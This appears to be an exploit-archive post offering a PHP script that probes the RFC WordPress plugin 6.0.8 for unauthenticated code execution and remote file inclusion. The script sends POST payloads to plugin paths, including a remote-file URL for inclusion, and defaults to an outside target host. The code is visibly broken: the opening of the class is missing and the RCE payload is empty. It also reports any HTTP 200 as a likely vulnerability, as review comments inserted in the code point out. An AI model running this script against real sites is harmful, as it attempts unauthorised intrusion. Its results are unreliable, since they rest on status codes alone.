============================================================================================================================================= | # Title : WordPress RFC Plugin 6.0.8 Security Scanner | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://wordpress.org/plugins/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/179099/ [+] Summary : The RFC WordPress Plugin version 6.0.8 contains critical security vulnerabilities that allow unauthenticated attackers to execute arbitrary code and include remote files on the target system. [+] POC : php poc.php
    // NOTE(review): the HTML extraction of this page dropped everything from the opening PHP tag
    // up to the first "->" of the statement below — i.e. the class header (the class is
    // WordPressExploitTester, instantiated further down), its property declarations and the
    // start of "$this->target = ...". The constructor evidently takes $target_url and stores
    // the target base URL without a trailing slash plus a fixed User-Agent. Confirm against
    // the original file.
    target = rtrim($target_url, '/');
    $this->user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
    }

    /**
     * Probes a fixed list of candidate plugin file paths under the target with a HEAD request
     * and prints one line per candidate.
     *
     * @return string|false the first path whose final response was HTTP 200, or false if none
     */
    public function test_plugin_existence() {
        $common_paths = [
            '/wp-content/plugins/rfc-wordpress/rfc.php',
            '/wp-content/plugins/rfc/rfc.php',
            '/wp-content/plugins/rfc-wordpress-plugin/rfc.php',
            '/wp-content/plugins/rfc-wp/rfc.php'
        ];
        echo "Testing plugin existence...\n";
        foreach ($common_paths as $path) {
            $url = $this->target . $path;
            $exists = $this->check_url_exists($url);
            if ($exists) {
                echo "✓ Plugin found: $url\n";
                return $path;
            } else {
                echo "✗ Not found: $path\n";
            }
        }
        return false;
    }

    /**
     * Sends the "RCE" probe: a form POST of rfc_action/rfc_settings to the plugin file.
     * The verdict comes from send_post_request(), which looks only at the HTTP status, so a
     * 200 here means "the endpoint answered a POST", not that anything was executed.
     *
     * @param string|null $plugin_path path returned by test_plugin_existence(); falls back to the rfc-wordpress path
     * @return string human-readable result line
     */
    public function test_rce_vulnerability($plugin_path = null) {
        if (!$plugin_path) {
            $plugin_path = '/wp-content/plugins/rfc-wordpress/rfc.php';
        }
        $url = $this->target . $plugin_path;
        // NOTE(review): empty in this rendering; the same extraction that dropped the opening
        // PHP tag above may have removed this literal — confirm against the original file.
        $payload = "";
        $post_data = array(
            'rfc_action' => 'save_settings',
            'rfc_settings' => $payload
        );
        echo "Testing RCE at: $url\n";
        return $this->send_post_request($url, $post_data, "RCE");
    }

    /**
     * Sends the "RFI" probe: a form POST of rfc_settings to the plugin file with
     * rfc_action=save_settings in the query string. The probe value is a URL on the reserved
     * example.com domain; this script only sends it as a form field and never fetches it.
     *
     * @param string|null $plugin_path path returned by test_plugin_existence(); falls back to the rfc-wordpress path
     * @return string human-readable result line
     */
    public function test_rfi_vulnerability($plugin_path = null) {
        if (!$plugin_path) {
            $plugin_path = '/wp-content/plugins/rfc-wordpress/rfc.php';
        }
        $url = $this->target . $plugin_path . '?rfc_action=save_settings';
        $payload = "http://example.com/test.txt";
        $post_data = array(
            'rfc_settings' => $payload
        );
        echo "Testing RFI at: $url\n";
        return $this->send_post_request($url, $post_data, "RFI");
    }

    /**
     * HEAD-requests $url and reports whether the final status was 200.
     *
     * Caveats visible in the options below: redirects are followed, so a site that redirects
     * unknown paths to a page that answers 200 will report every candidate as "found"; TLS
     * peer verification is off, so the answer may come from any interposed host; and the
     * curl_exec() result is discarded, so a transport failure (status 0) and a non-200
     * status are both reported as false.
     *
     * @return bool
     */
    private function check_url_exists($url) {
        $ch = curl_init();
        curl_setopt_array($ch, array(
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_NOBODY => true, // HEAD request only
            CURLOPT_TIMEOUT => 5,
            CURLOPT_USERAGENT => $this->user_agent,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_SSL_VERIFYPEER => false
        ));
        curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return ($http_code == 200);
    }

    /**
     * POSTs $data (form-encoded) to $url and maps the HTTP status to a result line.
     *
     * The verdict is status-only: a 200 is labelled "Potential vulnerability detected" although
     * a 200 can come from any page that answers a POST, and the response ($response, which
     * includes the headers because CURLOPT_HEADER is set) is captured but never inspected.
     * Read the output as a reachability check that needs manual confirmation, not as proof.
     * Redirects are followed and TLS peer verification is disabled, as in check_url_exists().
     *
     * @param string $url
     * @param array  $data         form fields
     * @param string $exploit_type label used in the result line ("RCE" / "RFI")
     * @return string result line ending in "\n"
     */
    private function send_post_request($url, $data, $exploit_type) {
        $ch = curl_init();
        curl_setopt_array($ch, array(
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => http_build_query($data),
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_TIMEOUT => 10,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_USERAGENT => $this->user_agent,
            CURLOPT_HEADER => true // include the response headers in the returned body
        ));
        $response = curl_exec($ch); // captured but unused below
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $error = curl_error($ch);
        curl_close($ch);
        echo "HTTP Response Code: $http_code\n";
        if ($error) {
            return "❌ Error in $exploit_type: " . $error . "\n";
        }
        if ($http_code == 200) {
            return "✅ $exploit_type test completed - Potential vulnerability detected (HTTP 200)\n";
        } elseif ($http_code == 404) {
            return "❌ $exploit_type test failed - Plugin not found (404)\n";
        } elseif ($http_code == 403) {
            return "❌ $exploit_type test failed - Access forbidden (403)\n";
        } else {
            return "⚠️ $exploit_type test - HTTP Code: $http_code (May require further analysis)\n";
        }
    }

    /**
     * Entry point: locate the plugin file, then run the two probes against that path and
     * print their result lines. Returns early (void) when no candidate path answered 200.
     */
    public function full_scan() {
        echo "=== WordPress RFC Plugin Security Scanner ===\n";
        echo "Target: " . $this->target . "\n\n";
        // Step 1: find the correct path
        $plugin_path = $this->test_plugin_existence();
        if (!$plugin_path) {
            echo "\n❌ RFC WordPress plugin not found on target.\n";
            echo "Possible reasons:\n";
            echo "- Plugin not installed\n";
            echo "- Different plugin name/path\n";
            echo "- Target is not WordPress\n";
            echo "- Access restrictions\n";
            return;
        }
        echo "\n✅ Plugin found! Starting vulnerability tests...\n\n";
        // Step 2: test the vulnerabilities
        $result1 = $this->test_rce_vulnerability($plugin_path);
        echo $result1 . "\n";
        $result2 = $this->test_rfi_vulnerability($plugin_path);
        echo $result2 . "\n";
        echo "\n=== Scan Complete ===\n";
    }
}

// Usage
if ($argc > 1) {
    $target = $argv[1];
} else {
    // NOTE(review): with no argument the scan is sent to this literal host, which is not a
    // reserved example name — an accidental run without arguments contacts a third party.
    $target = "https://target.com"; // change this to the real target
}
echo "WordPress RFC Plugin Security Scanner\n";
echo "=====================================\n\n";
$tester = new WordPressExploitTester($target);
$tester->full_scan();

// Alternative usage if you want to test a local site
class LocalTest {
    /**
     * Runs only the path probe (no POST requests) against a fixed list of local/loopback
     * base URLs and prints a separator after each.
     */
    public static function test_local_setup() {
        echo "\n=== Local Test Mode ===\n";
        $test_urls = [
            'http://localhost/wordpress',
            'http://127.0.0.1/wordpress',
            'http://localhost:8080',
            'http://test.local'
        ];
        foreach ($test_urls as $test_url) {
            echo "Testing: $test_url\n";
            $tester = new WordPressExploitTester($test_url);
            $tester->test_plugin_existence();
            echo "---\n";
        }
    }
}
// To enable the local test, uncomment the next line:
// LocalTest::test_local_setup();
?>
Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================